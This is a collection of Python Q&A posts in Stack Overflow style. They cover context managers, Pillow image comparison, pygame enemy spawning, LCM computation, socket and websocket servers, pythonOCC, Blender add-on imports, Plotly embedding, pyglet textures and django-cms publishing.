From: name <[email protected]>
Date: Sun, 13 Oct 2013 06:22:30
helloworld
|
Python disable while iterating
Question: So I am creating a data structure that is based on storage and memory. Lets
say I have the following method:
def __store(self):
#stores information into self.__memory list
now what I want to do is, if this function is called inside a loop, I want it
to be called **only after the loop is finished**
# My reasons
This method gets called in many other methods, most importantly `__setitem__`
so take a look at the following code:
for i in xrange(100):
class[i] = i + 5
right now, this will store the information up until the loop finished (100
times), but I only want it to store the information after the loop finishes.
# question
essentially I just need to be able to stop a function from running if
iteration is going on in the program, and then execute once the iteration is
done.
**how can I do that?**
# extra info
This data structure is a dictionary that has many functions for memory.
The kind of full-storage memory that I am storing with `__store` is for the
purpose of undoing . Anything in a loop would have no need for an undo
because, until the loop is over, the user should not need to undo anything.
This memory is based on control, so anything inside iteration should not be
stored because there is no need for the actual memory.
That is why I would not like to store during iteration, but, if something that
requires storage is run inside iteration, I would like it to run after the
iteration it was inside completes.
Answer: A function behave difference while inside a loop is a bad idea, try to use
`context manager` instead. it is a better way to do so and it is easier to
understand. <http://www.python.org/dev/peps/pep-0343/>
For example:
with sqlite3.connect(":memory:") as conn:
# update will hold in transaction.
for i in xrange(100):
conn.execute("insert ....")
pass
# sqlite3 will commit now
In the same way:
with a() as b:
# data won't store
for i in xrange(100):
# don't store data
b[i] = i + 5
pass
# data store while leave context
# EDIT 1
ContextManager has **enter** , and **exit** method will
class MemoryManager(object):
def __init__(self):
self.cache = {}
self.buffer = False
def __enter__(self):
self.buffer = True
def __store(self):
# store data
pass
def __setitem__(self, key, value):
self.cache[key] = value
if not self.buffer:
self.__store()
def __exit__(self, exc_type, exc_value, traceback):
self.__store()
self.buffer = False
Therefore
m = MemoryManager()
with m as b:
# __enter__ got called, set the manager to buffer mode
# data won't store
for i in xrange(100):
# don't store data
m[i] = i + 5 # in with block, so __store won't be called
pass
# __exit__ got called, __store automatically and leave buffer mode
m[0] = 10 # not in buffer mode, __store will be called
|
importing python modules - ImageChops
Question: I'm looking for a good way to analyze image similarity, using python. I'm NOT
looking for a way to establish whether two images are identical. I'm just
looking for a way to establish the similarity between two images (e.g., if two
images are very similar they could be given a "grade" of 9/10; if they are
completely unalike, they'll be given a very low index, such as 2/10). From
some reading that I've done, the module ImageChops has been suggested -
however, I haven't been able to find a way to download it. If anyone knows how
to download it, or has a suggestion for other effective solutions, I'd greatly
appreciate their advice!
Thanks in advance!
Answer: [ImageChops is a module from PIL(Pillow)](https://github.com/python-
imaging/Pillow/blob/master/PIL/ImageChops.py). To use the ImageChops function
you need to `pip install Pillow` OR `easy_install Pillow` OR [download the
src](https://github.com/python-imaging/Pillow) & extract the src then from CMD
CD to the extracted folder & run `python setup.py install`.
To use the ImageChops you can do this `from PIL import ImageChops` you can
read the [document section](http://pillow.readthedocs.org/en/latest/PIL.html)
some basic usage example <http://effbot.org/imagingbook/imagechops.htm>
To check the difference between 2 images:
import Image
from PIL import ImageChops
im1 = Image.open("splash.png")
im2 = Image.open("splash2.png")
diff = ImageChops.difference(im2, im1)
there's a [compare images script](https://gist.github.com/astanin/626356), but
its not a PIL; its on [scipy module](https://github.com/scipy/scipy) You may
also check [this script
here](http://code.activestate.com/recipes/577630-comparing-two-images/)
|
Python Printing the String Result
Question:
import operator
def mkEntry(file1):
results = []
for line in file1:
lst = line.rstrip().split(",")
lst[2] = int(lst[2])
results.append(lst)
return print(sorted(results, key=operator.itemgetter(1,2)))
def main():
openFile = 'names/' + 'yob' + input("Enter the Year: ") + '.txt'
file1 = open(openFile)
mkEntry(file1)
main()
File:
Emily,F,25021
Emma,F,21595
Madison,F,20612
Olivia,F,16100
Joaquin,M,711
Maurice,M,711
Kade,M,701
Rodrigo,M,700
Tate,M,699
How do I print out the result looks like this: 1\. Name (Gender): Numbers
Instead of ['name', 'gender', numbers]
I have trouble doing the string thing. It won't give me the good output. Any
help?
Thanks
Answer: `return print(sorted(results, key=operator.itemgetter(1,2)))` isn't doing what
you'd expect it to.
Because `print()` returns `None`, your function will `return None`. Get rid of
the print statement (if you want to print the line, just put it before the
return)
Then you can do in your `main()` function:
for person in mkEntry(file1):
print("1. {0} ({1}): {2}".format(*person))
|
Sequential pattern matching algorithm in Python
Question: I find myself in this situation that I need to implement an algorithm for
sequential pattern matching in Python. Can't find any working library/snippet
on the internet after searching for hours.
problem definition:
implement a function sequential_pattern_match
> input: tokens, (an ordered collection of strings)
>
> output: a list of tuples, each tuple = (any subcollection of tokens, tag)
domain experts will define the matching rule, usually using regex
> test(tokens) -> tag or None
Example:
> input: ["Singapore", "Python", "User", "Group", "is", "here"]
>
> output: [(["Singapore", "Python", "User", "Group"], "ORGANIZATION"), ("is",
> 'O'), ("here", 'O')]
'O' means no match.
Conflict resolution rules:
1. a match that appears first has higher precedence. e.g. "Singapore property sales", if two conflicting matches are possible, "Singapore property" as asset and "property sales" as event, then the first one is used.
2. a longer match has higher precedence than shorter match. e.g. "Singapore Python User Group" as organization takes higher precedence than individual matches of "Singapore" as location + "Python" as language.
With my expertise in algorithms and data structure, this is my implementation:
from itertools import ifilter, imap
MAX_PATTERN_LENGTH = 3
def test(tokens):
length = len(tokens)
if (length == 1):
if tokens[0] == "Nexium":
return "MEDICINE"
elif tokens[0] == "pain":
return "SYMPTOM"
elif (length == 2):
string = ' '.join(tokens)
if string == "Barium Swallow":
return "INTERVENTION"
elif string == "Swallow Test":
return "INTERVENTION"
else:
if ' '.join(tokens) == "pain in stomach":
return "SYMPTOM"
def _evaluate(tokens):
tag = test(tokens)
if tag:
return (tokens, tag)
elif len(tokens) == 1:
return (tokens, 'O')
def _splits(tokens):
return ((tokens[:i], tokens[i:]) for i in xrange(min(len(tokens), MAX_PATTERN_LENGTH), 0, -1))
def sequential_pattern_match(tokens):
return ifilter(bool, imap(_halves_match, _splits(tokens))).next()
def _halves_match(halves):
result = _evaluate(halves[0])
if result:
return [result] + (halves[1] and sequential_pattern_match(halves[1]))
if __name__ == "__main__":
tokens = "I went to a clinic to do a Barium Swallow Test because I had pain in stomach after taking Nexium".split()
output = sequential_pattern_match(tokens)
slashTags = ' '.join(t + '/' + tag for tokens, tag in output for t in tokens)
print(slashTags)
assert slashTags == "I/O went/O to/O a/O clinic/O to/O do/O a/O Barium/INTERVENTION Swallow/INTERVENTION Test/O because/O I/O had/O pain/SYMPTOM in/SYMPTOM stomach/SYMPTOM after/O taking/O Nexium/MEDICINE"
import timeit
t = timeit.Timer(
'sequential_pattern_match("I went to a clinic to do a Barium Swallow Test because I had pain in stomach after taking Nexium".split())',
'from __main__ import sequential_pattern_match'
)
print(t.repeat(3, 10000))
I don't think it can be faster. Unfortunately it was written in functional
style, which may be unsuitable in Python. Are you able to come out with a
faster implementation in OO or imperative style?
(Note: I am sure it will be faster if implemented in C, but currently I have
no plan of using other language other than Python)
Answer:
def sequential_pattern_match(tokens):
for first, rest in _splits(tokens):
x = _halves_match(first, rest)
if x:
return x
def _splits(tokens):
for i in xrange(min(len(tokens), MAX_PATTERN_LENGTH), 0, -1):
yield tokens[:i], tokens[i:]
def _halves_match(first, rest):
tag = test(first)
if tag:
return [(first, tag)] + (rest and sequential_pattern_match(rest))
def test(tokens):
length = len(tokens)
if length == 1:
if tokens[0] == "Nexium":
return "MEDICINE"
elif tokens[0] == "pain":
return "SYMPTOM"
else:
return "O"
elif length == 2:
if tokens == ["Barium", "Swallow"]:
return "INTERVENTION"
elif tokens == ["Swallow", "Test"]:
return "INTERVENTION"
elif tokens == ["pain", "in", "stomach"]:
return "SYMPTOM"
replaced `ifilter`, `imap` with simple `for` loop. generator expression with
`for` loop with `yield`.
Time reduced in my machine:
* _1.02694065435_ -> _0.708227394544_ (Python 2.7.5)
* _1.1575780184_ -> _0.425939527209_ (PyPy 2.1)
|
Displaying an amount of objects on to the screen and positioning
Question: I am following this tutorial: <http://www.raywenderlich.com/24252/beginning-
game-programming-for-teens-with-python#comments> And I am trying to reduce the
amount of badgers drawn to the screen from the part where the badgers are
drawn. It looks to me as the `random.randint(50,430)` draws a number of
badgers between 50 and 430. But i would like a smaller number say 5-9 badgers
drawn on the screen. I would also like to know the position of where the
badgers are comming from. I would like it so the badgers fall from the air.
How do i do this?
if badtimer==0:
badguys.append([640, random.randint(50,430)])
badtimer=100-(badtimer1*2)
if badtimer1>=35:
badtimer1=35
else:
badtimer1+=5
index=0
for badguy in badguys:
if badguy[0]<-64:
badguys.pop(index)
badguy[0]-=7
index+=1
for badguy in badguys:
screen.blit(badguyimg, badguy)
here is the full code:
# 1 - Import library
import pygame
from pygame.locals import *
import math
import random
# 2 - Initialize the game
pygame.init()
width, height = 640, 480
screen=pygame.display.set_mode((width, height))
keys = [False, False, False, False]
playerpos=[100,100]
acc=[0,0]
arrows=[]
badtimer=100
badtimer1=0
badguys=[[640,100]]
healthvalue=194
pygame.mixer.init()
# 3 - Load image
player = pygame.image.load("resources/images/dude.png")
grass = pygame.image.load("resources/images/grass.png")
castle = pygame.image.load("resources/images/castle.png")
arrow = pygame.image.load("resources/images/bullet.png")
badguyimg1 = pygame.image.load("resources/images/badguy.png")
badguyimg=badguyimg1
healthbar = pygame.image.load("resources/images/healthbar.png")
health = pygame.image.load("resources/images/health.png")
gameover = pygame.image.load("resources/images/gameover.png")
youwin = pygame.image.load("resources/images/youwin.png")
# 3.1 - Load audio
hit = pygame.mixer.Sound("resources/audio/explode.wav")
enemy = pygame.mixer.Sound("resources/audio/enemy.wav")
shoot = pygame.mixer.Sound("resources/audio/shoot.wav")
hit.set_volume(0.05)
enemy.set_volume(0.05)
shoot.set_volume(0.05)
pygame.mixer.music.load('resources/audio/moonlight.wav')
pygame.mixer.music.play(-1, 0.0)
pygame.mixer.music.set_volume(0.25)
# 4 - keep looping through
running = 1
exitcode = 0
while running:
badtimer-=1
# 5 - clear the screen before drawing it again
screen.fill(0)
# 6 - draw the player on the screen at X:100, Y:100
for x in range(0, int(width/grass.get_width()+1)):
for y in range(0, int(height/grass.get_height()+1)):
screen.blit(grass,(x*100,y*100))
screen.blit(castle,(0,30))
screen.blit(castle,(0,135))
screen.blit(castle,(0,240))
screen.blit(castle,(0,345 ))
# 6.1 - Set player position and rotation
position = pygame.mouse.get_pos()
angle = math.atan2(position[1]-(playerpos[1]+32),position[0]-(playerpos[0]+26))
playerrot = pygame.transform.rotate(player, 360-angle*57.29)
playerpos1 = (playerpos[0]-playerrot.get_rect().width/2, playerpos[1]-playerrot.get_rect().height/2)
screen.blit(playerrot, playerpos1)
# 6.2 - Draw arrows
for bullet in arrows:
index=0
velx=math.cos(bullet[0])*10
vely=math.sin(bullet[0])*10
bullet[1]+=velx
bullet[2]+=vely
if bullet[1]<-64 or bullet[1]>640 or bullet[2]<-64 or bullet[2]>480:
arrows.pop(index)
index+=1
for projectile in arrows:
arrow1 = pygame.transform.rotate(arrow, 360-projectile[0]*57.29)
screen.blit(arrow1, (projectile[1], projectile[2]))
# 6.3 - Draw badgers
if badtimer==0:
badguys.append([640, random.randint(50,430)])
badtimer=100-(badtimer1*2)
if badtimer1>=35:
badtimer1=35
else:
badtimer1+=5
index=0
for badguy in badguys:
if badguy[0]<-64:
badguys.pop(index)
badguy[0]-=7
# 6.3.1 - Attack castle
badrect=pygame.Rect(badguyimg.get_rect())
badrect.top=badguy[1]
badrect.left=badguy[0]
if badrect.left<64:
hit.play()
healthvalue -= random.randint(5,20)
badguys.pop(index)
#6.3.2 - Check for collisions
index1=0
for bullet in arrows:
bullrect=pygame.Rect(arrow.get_rect())
bullrect.left=bullet[1]
bullrect.top=bullet[2]
if badrect.colliderect(bullrect):
enemy.play()
acc[0]+=1
badguys.pop(index)
arrows.pop(index1)
index1+=1
# 6.3.3 - Next bad guy
index+=1
for badguy in badguys:
screen.blit(badguyimg, badguy)
# 6.4 - Draw clock
font = pygame.font.Font(None, 24)
survivedtext = font.render(str((90000-pygame.time.get_ticks())/60000)+":"+str((90000-pygame.time.get_ticks())/1000%60).zfill(2), True, (0,0,0))
textRect = survivedtext.get_rect()
textRect.topright=[635,5]
screen.blit(survivedtext, textRect)
# 6.5 - Draw health bar
screen.blit(healthbar, (5,5))
for health1 in range(healthvalue):
screen.blit(health, (health1+8,8))
# 7 - update the screen
pygame.display.flip()
# 8 - loop through the events
for event in pygame.event.get():
# check if the event is the X button
if event.type==pygame.QUIT:
# if it is quit the game
pygame.quit()
exit(0)
if event.type == pygame.KEYDOWN:
if event.key==K_w:
keys[0]=True
elif event.key==K_a:
keys[1]=True
elif event.key==K_s:
keys[2]=True
elif event.key==K_d:
keys[3]=True
if event.type == pygame.KEYUP:
if event.key==pygame.K_w:
keys[0]=False
elif event.key==pygame.K_a:
keys[1]=False
elif event.key==pygame.K_s:
keys[2]=False
elif event.key==pygame.K_d:
keys[3]=False
if event.type==pygame.MOUSEBUTTONDOWN:
shoot.play()
position=pygame.mouse.get_pos()
acc[1]+=1
arrows.append([math.atan2(position[1]-(playerpos1[1]+32),position[0]-(playerpos1[0]+26)),playerpos1[0]+32,playerpos1[1]+32])
# 9 - Move player
if keys[0]:
playerpos[1]-=5
elif keys[2]:
playerpos[1]+=5
if keys[1]:
playerpos[0]-=5
elif keys[3]:
playerpos[0]+=5
#10 - Win/Lose check
if pygame.time.get_ticks()>=90000:
running=0
exitcode=1
if healthvalue<=0:
running=0
exitcode=0
if acc[1]!=0:
accuracy=acc[0]*1.0/acc[1]*100
else:
accuracy=0
# 11 - Win/lose display
if exitcode==0:
pygame.font.init()
font = pygame.font.Font(None, 24)
text = font.render("Accuracy: "+str(accuracy)+"%", True, (255,0,0))
textRect = text.get_rect()
textRect.centerx = screen.get_rect().centerx
textRect.centery = screen.get_rect().centery+24
screen.blit(gameover, (0,0))
screen.blit(text, textRect)
else:
pygame.font.init()
font = pygame.font.Font(None, 24)
text = font.render("Accuracy: "+str(accuracy)+"%", True, (0,255,0))
textRect = text.get_rect()
textRect.centerx = screen.get_rect().centerx
textRect.centery = screen.get_rect().centery+24
screen.blit(youwin, (0,0))
screen.blit(text, textRect)
while 1:
for event in pygame.event.get():
if event.type == pygame.QUIT:
pygame.quit()
exit(0)
pygame.display.flip()
Answer: Only 1 bager is added each time badtimer==0. The line badguys.append([640,
random.randint(50,430)]) adds a new badguy at that location (x=640,
y=random.randint(50,430)]) on the screen.
If you want to change the number of bad guys loaded you have to change this
part of the code
if badtimer==0:
badguys.append([640, random.randint(50,430)])
badtimer=100-(badtimer1*2)
if badtimer1>=35:
badtimer1=35
else:
badtimer1+=5
There are two varables that the spawning on badguys depends on **badtimer**
and **badtimer1**.
**badtimer1** is used to increase the rate at which badguys are spawned as the
game goes on (Technically it increments each time a badguy is spawned).
**badtimer** is used to actually create the badguys every so offten which is
decremented each loop.
* * *
To have them fall from the sky you need to change their original starting
point and their updating.
badguys.append([random.randint(50,590), 0])
and Updating
for badguy in badguys:
if badguy[1]<520:
badguys.pop(index)
badguy[1]+=7 //You can change this number if it is too fast
|
Project Euler getting smallest multiple in python
Question: I am doing problem five in Project Euler: "2520 is the smallest number that
can be divided by each of the numbers from 1 to 10 without any remainder.
What is the smallest positive number that is evenly divisible by all of the
numbers from 1 to 20?"
I have constructed the following code which finds the correct value 2520 when
using 1 - 10 as divisors but code seems to be going on forever when using 1 -
20. Again I don't want the code just a pointer or two on where I am going
wrong. Thanks
def smallestDiv(n):
end=False
while end == False:
divisors = [x for x in range(1,21)] # get divisors
allDivisions = zip(n % i for i in divisors) # get values for n % all integers in divisors
check = all(item[0] == 0 for item in allDivisions ) # check if all values of n % i are equal to zero
if check: # if all values are equal to zero return n
end = True
return n
else: # else increase n by 1
n +=1
EDIT:
I used some code I found relating to LCM and used reduce to solve the problem:
def lcm(*values):
values = [value for value in values]
if values:
n = max(values)
m = n
values.remove(n)
while any( n % value for value in values ):
n +=m
return n
return 0
print reduce(lcm, range(1,21))
Answer: If a problem is hard, trying solving a simpler version. Here, how to calculate
the lowest common multiple of _two_ numbers. If you've read any number theory
book (or think about prime factors), you can do that using the greatest common
divisor function (as implemented by the Euclidean algorithm).
from fractions import gcd
def lcm(a,b):
"Calculate the lowest common multiple of two integers a and b"
return a*b//gcd(a,b)
Observing `lcm(a,b,c) ≡ lcm(lcm(a,b),c)` it's simple to solve your problem
with Python's
[`reduce`](http://docs.python.org/2/library/functions.html#reduce) function
>>> from functools import reduce
>>> reduce(lcm, range(1,10+1))
2520
>>> reduce(lcm, range(1,20+1))
232792560
|
Multi-threaded websocket server on Python
Question: Please help me to improve this code:
import base64
import hashlib
import threading
import socket
class WebSocketServer:
def __init__(self, host, port, limit, **kwargs):
"""
Initialize websocket server.
:param host: Host name as IP address or text definition.
:param port: Port number, which server will listen.
:param limit: Limit of connections in queue.
:param kwargs: A dict of key/value pairs. It MAY contains:<br>
<b>onconnect</b> - function, called after client connected.
<b>handshake</b> - string, containing the handshake pattern.
<b>magic</b> - string, containing "magic" key, required for "handshake".
:type host: str
:type port: int
:type limit: int
:type kwargs: dict
"""
self.host = host
self.port = port
self.limit = limit
self.running = False
self.clients = []
self.args = kwargs
def start(self):
"""
Start websocket server.
"""
self.root = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.root.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.root.bind((self.host, self.port))
self.root.listen(self.limit)
self.running = True
while self.running:
client, address = self.root.accept()
if not self.running: break
self.handshake(client)
self.clients.append((client, address))
onconnect = self.args.get("onconnect")
if callable(onconnect): onconnect(self, client, address)
threading.Thread(target=self.loop, args=(client, address)).start()
self.root.close()
def stop(self):
"""
Stop websocket server.
"""
self.running = False
def handshake(self, client):
handshake = 'HTTP/1.1 101 Switching Protocols\r\nConnection: Upgrade\r\nUpgrade: websocket\r\nSec-WebSocket-Accept: %s\r\n\r\n'
handshake = self.args.get('handshake', handshake)
magic = "258EAFA5-E914-47DA-95CA-C5AB0DC85B11"
magic = self.args.get('magic', magic)
header = str(client.recv(1000))
try:
res = header.index("Sec-WebSocket-Key")
except ValueError:
return False
key = header[res + 19: res + 19 + 24]
key += magic
key = hashlib.sha1(key.encode())
key = base64.b64encode(key.digest())
client.send(bytes((handshake % str(key,'utf-8')), 'utf-8'))
return True
def loop(self, client, address):
"""
:type client: socket
"""
while True:
message = ''
m = client.recv(1)
while m != '':
message += m
m = client.recv(1)
fin, text = self.decodeFrame(message)
if not fin:
onmessage = self.args.get('onmessage')
if callable(onmessage): onmessage(self, client, text)
else:
self.clients.remove((client, address))
ondisconnect = self.args.get('ondisconnect')
if callable(ondisconnect): ondisconnect(self, client, address)
client.close()
break
def decodeFrame(self, data):
if (len(data) == 0) or (data is None):
return True, None
fin = not(data[0] & 1)
if fin:
return fin, None
masked = not(data[1] & 1)
plen = data[1] - (128 if masked else 0)
mask_start = 2
if plen == 126:
mask_start = 4
plen = int.from_bytes(data[2:4], byteorder='sys.byteorder')
elif plen == 127:
mask_start = 10
plen = int.from_bytes(data[2:10], byteorder='sys.byteorder')
mask = data[mask_start:mask_start+4]
data = data[mask_start+4:mask_start+4+plen]
decoded = []
i = 0
while i < len(data):
decoded.append(data[i] ^ mask[i%4])
i+=1
text = str(bytearray(decoded), "utf-8")
return fin, text
def sendto(self, client, data, **kwargs):
"""
Send <b>data</b> to <b>client</b>. <b>data</b> can be of type <i>str</i>, <i>bytes</i>, <i>bytearray</i>, <i>int</i>.
:param client: Client socket for data exchange.
:param data: Data, which will be sent to the client via <i>socket</i>.
:type client: socket
:type data: str|bytes|bytearray|int|float
"""
if type(data) == bytes or type(data) == bytearray:
frame = data
elif type(data) == str:
frame = bytes(data, kwargs.get('encoding', 'utf-8'))
elif type(data) == int or type(data) == float:
frame = bytes(str(data), kwargs.get('encoding', 'utf-8'))
else:
return None
framelen = len(frame)
head = bytes([0x81])
if framelen < 126:
head += bytes(int.to_bytes(framelen, 1, 'big'))
elif 126 <= framelen < 0x10000:
head += bytes(126)
head += bytes(int.to_bytes(framelen, 2, 'big'))
else:
head += bytes(127)
head += bytes(int.to_bytes(framelen, 8, 'big'))
client.send(head + frame)
It works fine. I want the server to use all the processor cores for improved
performance. And this code is not effective in high quantities connections.
How to implement a multi-threaded solution for this case?
sorry for my bad english.
Answer: > In CPython, the global interpreter lock, or GIL, is a mutex that prevents
> multiple native threads from executing Python bytecodes at once.
So your code won't work. You can use
[processeses](http://docs.python.org/2/library/multiprocessing.html) instead
of threads (not on Windows*), [twisted](http://twistedmatrix.com/trac/) or
[asyncore](http://docs.python.org/2/library/asyncore.html) if you want to
support more than one client at the same time.
If your choice is multiprocessing, try this:
client.py:
import socket
def main():
s = socket.socket()
s.connect(("localhost", 5555))
while True:
data = raw_input("> ")
s.send(data)
if data == "quit":
break
s.close()
if __name__ == "__main__":
main()
server.py:
from multiprocessing import Process
from os import getpid
import socket
def receive(conn):
print "(%d) connected." % getpid()
while True:
data = conn.recv(1024)
if data:
if data == "quit":
break
else:
print "(%s) data" % getpid()
def main():
s = socket.socket()
s.bind(("localhost", 5555))
s.listen(1)
while True:
conn, address = s.accept()
print "%s:%d connected." % address
Process(target=receive, args=(conn,)).start()
s.close()
if __name__ == "__main__":
main()
*On Windows this code will throw an error when pickling the socket:
File "C:\Python27\lib\pickle.py", line 880, in load_eof
raise EOFError
|
Splines in pythonOCC
Question: This question is about how to use splines in general in pythonOCC, There are
two part to this question.
Have found out that I can create a spline by
array = []
array.append(gp_Pnt2d (0,0))
array.append(gp_Pnt2d (1,2))
array.append(gp_Pnt2d (2,3))
array.append(gp_Pnt2d (4,3))
array.append(gp_Pnt2d (5,5))
pt2d_list = point2d_list_to_TColgp_Array1OfPnt2d(array)
SPL1 = Geom2dAPI_PointsToBSpline(pt2d_list).Curve()
display.DisplayShape(make_edge2d(SPL1) , update=True)
And I expect that the bspline can be calculated by
BSPL1 = Geom2dAPI_PointsToBSpline(pt2d_list)
But how do I get:
1. The derivative of the bspline?
2. The knots of the bspline?
3. Is the knots the pt2d_list?
4. The control points of the bspline?
5. The coefficients of the spline?
And how do i remove or add knots to the bspline?
When loading a CAD drawing .stp file in pythonOCC like this:
from OCC import TopoDS, StlAPI
shape = TopoDS.TopoDS_Shape()
stl_reader = StlAPI.StlAPI_Reader()
stl_reader.Read(shape,str(filename))
display.DisplayShape(shape)
How do I get the data out of the shape like knot, bspline, and coefficients.
best regards,
Answer: I would take a look at [scipy documentation](http://docs.scipy.org/doc/) and
search there for the the functions you are trying to apply.
|
Blender ImportError: cannot import name
Question: I am really almost giving up on trying to create an import-export module addon
to Blender 2.68 and it seems that it is an insurmountable python problem
(Blender uses python 3.3). I see plenty of questions in stackoverflow on this
topic but none of them answers my problem. Part of my script:
if "bpy" in locals():
import imp
imp.reload(xplane_ui)
print ("xplane_ui reloaded.")
imp.reload(explane_import)
print ("All modules reloaded.")
else:
import bpy
from io_explane import xplane_ui
print ("xplane_ui imported.")
from io_explane import explane_import #this is line 47
print ("All modules imported")
I added extra print lines to see what is happening. Here is the trace result:
Read new prefs: C:\Users\BT\AppData\Roaming\Blender Foundation\Blender\2.68\config\userpref.blend
found bundled python: C:\blender-2.68a-windows32\2.68\python
xplane_ui imported
All modules imported
xplane_ui imported.
Traceback (most recent call last):
File "C:\blender-2.68a-windows32\2.68\scripts\modules\addon_utils.py", line 294, in enable
mod = __import__(module_name)
File "C:\blender-2.68a-windows32\2.68\scripts\addons\io_explane\__init__.py", line 47, in <module>
from io_explane import explane_import
ImportError: cannot import name explane_import
This is so queer. I presume python progresses from top to bottom but how would
it progress through lines 46, 47 and 48 and then change decision on line 47
and announce it could not do it after having obviously done it? Either python
is a useless programmng language or blender is broken or both. Either way the
error trapping routines are extremely unhelpful.
Answer: I don't know Blender, but could it be that you should import `xplane_import`?
|
Embed Plotly graph into a webpage with Bottle
Question: Hi i am using plotly to generate graphs using Python, Bottle. However, this
returns me a url. Like:
https://plot.ly/~abhishek.mitra.963/1
I want to paste the entire graph into my webpage instead of providing a link.
Is this possible?
My code is:
import os
from bottle import run, template, get, post, request
from plotly import plotly
py = plotly(username='user', key='key')
@get('/plot')
def form():
return '''<h2>Graph via Plot.ly</h2>
<form method="POST" action="/plot">
Name: <input name="name1" type="text" />
Age: <input name="age1" type="text" /><br/>
Name: <input name="name2" type="text" />
Age: <input name="age2" type="text" /><br/>
Name: <input name="name3" type="text" />
Age: <input name="age3" type="text" /><br/>
<input type="submit" />
</form>'''
@post('/plot')
def submit():
name1 = request.forms.get('name1')
age1 = request.forms.get('age1')
name2 = request.forms.get('name2')
age2 = request.forms.get('age2')
name3 = request.forms.get('name3')
age3 = request.forms.get('age3')
x0 = [name1, name2, name3];
y0 = [age1, age2, age3];
data = {'x': x0, 'y': y0, 'type': 'bar'}
response = py.plot([data])
url = response['url']
filename = response['filename']
return ('''Congrats! View your chart here <a href="https://plot.ly/~abhishek.mitra.963/1">View Graph</a>!''')
if __name__ == '__main__':
port = int(os.environ.get('PORT', 8080))
run(host='0.0.0.0', port=port, debug=True)
Answer: Yes, embedding is possible. Here's an iframe snippet you can use (with any
Plotly URL):
`<iframe width="800" height="600" frameborder="0" seamless="seamless"
scrolling="no"
src="https://plot.ly/~abhishek.mitra.963/1/.embed?width=800&height=600"></iframe>`
The plot gets embedded at a URL that is made especially for embedding the
plot. So in this case your plot is <https://plot.ly/~abhishek.mitra.963/1/>.
The URL to embed it is made by adding .embed to the URL:
<https://plot.ly/~abhishek.mitra.963/1.embed>.
You can change the width/height dimensions in that snippet. To get the iframe
code and see different sizes, you can click the embed icon on a plot, or when
you share it generate the code. Here's where the embed options are:

[Here's how an embedded graph looks in the Washington
Post](http://www.washingtonpost.com/blogs/wonkblog/wp/2013/06/14/do-low-taxes-
on-the-rich-leave-the-middle-class-with-lower-wages/). And
[here](https://realpython.com/blog/python/developing-with-bottle-part-2-plot-
ly-api/) is a helpful tutorial someone made on developing with Plotly and
Bottle.
Let me know if that doesn't work, and I'm happy to help out.
Disclosure: I'm on the Plotly team.
|
OpenGL Pyglet "Error: global name 'texture' not defined"
Question: The error is on line 5: glBindTexture(texture.target, texture.id)
1. import pyglet
2. from pyglet.gl import *
3. class CustomGroup(pyglet.graphics.Group):
4. def set_state(self):
5. glEnable(texture.target)
6. glBindTexture(texture.target, texture.id)
7. def unset_state(self):
8. glDisable(texture.target)
NameError: global name 'texture' not defined but i imported it on line 2. the
full code is [here](http://pastebin.com/10JbiCYp "code")
Any help? I am using python 2.7.3 with pyglet and ubuntu 12.04
Answer: The `pyglet.gl` module does not define any variable `texture`, so your import
statement in line 2 does not provide anything like that. And what do you even
expect it to contain? You'll need to create your
[`Texture`](http://www.pyglet.org/doc/api/pyglet.image.Texture-class.html)
object yourself.
To do so, you could use the methods
[`pyglet.resource.image`](http://www.pyglet.org/doc/api/pyglet.resource-
module.html#image) or
[`pyglet.resource.texture`](http://www.pyglet.org/doc/api/pyglet.resource-
module.html#texture) or you could load an `AbstractImage` by calling
[`pyglet.image.load`](http://www.pyglet.org/doc/api/pyglet.image-
module.html#load) and retrieve a corresponding `Texture` object by accessing
the image's `texture` member or, say, adding it to a
[`TextureAtlas`](http://www.pyglet.org/doc/programming_guide/image_sequences_and_atlases.html#texture-
bins-and-atlases).
Why don't you add to your code:
img = pyglet.image.load('imagefile.png')
texture = img.texture
and don't forget to alter your `vertex_list`
[accordingly](http://www.pyglet.org/doc/programming_guide/vertex_attributes.html)
to make use of the texture.
|
django-cms refusing to publish a specific page in production - where should I start debugging?
Question: I have a small problem in my production cms. One of the pages (There are about
50) is refusing to be published. I mean: if I click on "publish" in the admin
interface or use the method publish_page I am not getting any errors. On the
page list view there's a green check by this page. But when I browse in there,
I am getting a nice 404 error. And if I refresh the page list view, the green
check turns into a red sign (not published).
I don't know where should I start debugging this issue.
>>> from cms.api import publish_page
>>> p = Page.objects.get(pk__exact=66)
>>> r = User.objects.get(pk=2)
>>> p2 = publish_page(p, r)
>>> p2
<cms.models.pagemodel.Page object at 0x3561910>
>>> p2.is_public_published()
True
There are no error traces in my /var/log/httpd/access_log nor
/var/log/httpd/error_log (apart of the 404 warning). These are my logging
settings:
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'formatters': {
'verbose': {
'format': '%(levelname)s %(asctime)s %(module)s %(process)d %(thread)d %(message)s'
},
'simple': {
'format': '%(levelname)s %(message)s'
},
},
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse'
}
},
'handlers': {
'mail_admins': {
'level': 'ERROR',
'filters': ['require_debug_false'],
'class': 'django.utils.log.AdminEmailHandler'
},
'console': {
'level': 'DEBUG',
'class': 'logging.StreamHandler',
'formatter': 'verbose'
},
},
'loggers': {
'django': {
'handlers': ['console'],
'level': 'DEBUG',
'propagate': True,
},
'django.request': {
'handlers': ['mail_admins'],
'level': 'DEBUG',
'propagate': True,
},
'department.models': {
'handlers': ['console'],
'level': 'DEBUG'
},
}
}
Could you please suggest me where to start debugging? Thanks!
Roberto
UPDATE:
My virtual environment has the following installed:
Django - 1.5.4 - active
PIL - 1.1.7 - active
Pillow - 2.2.1 - active
Pygments - 1.6 - active
Python - 2.7.3 - active development (/usr/lib/python2.7/lib-dynload)
South - 0.8.2 - active
argparse - 1.2.1 - active development (/usr/lib/python2.7)
bpython - 0.12 - active
cmsplugin-news - 0.4.2 - active
django-autoslug - 1.7.1 - active
django-ckeditor - 4.0.2 - active
django-classy-tags - 0.4 - active
django-cms - 2.4.2 - active
django-country-dialcode - 0.4.8 - active
django-extensions - 1.2.2 - active
django-guardian - 1.1.1 - active
django-hvad - 0.3 - active
django-modeltranslation - 0.6.1 - active
django-mptt - 0.5.2 - active
django-reusableapps - 0.1.1 - active
django-reversion - 1.7.1 - active
django-sekizai - 0.7 - active
djangocms-text-ckeditor - 1.0.10 - active
html5lib - 1.0b3 - active
pip - 1.2.1 - active
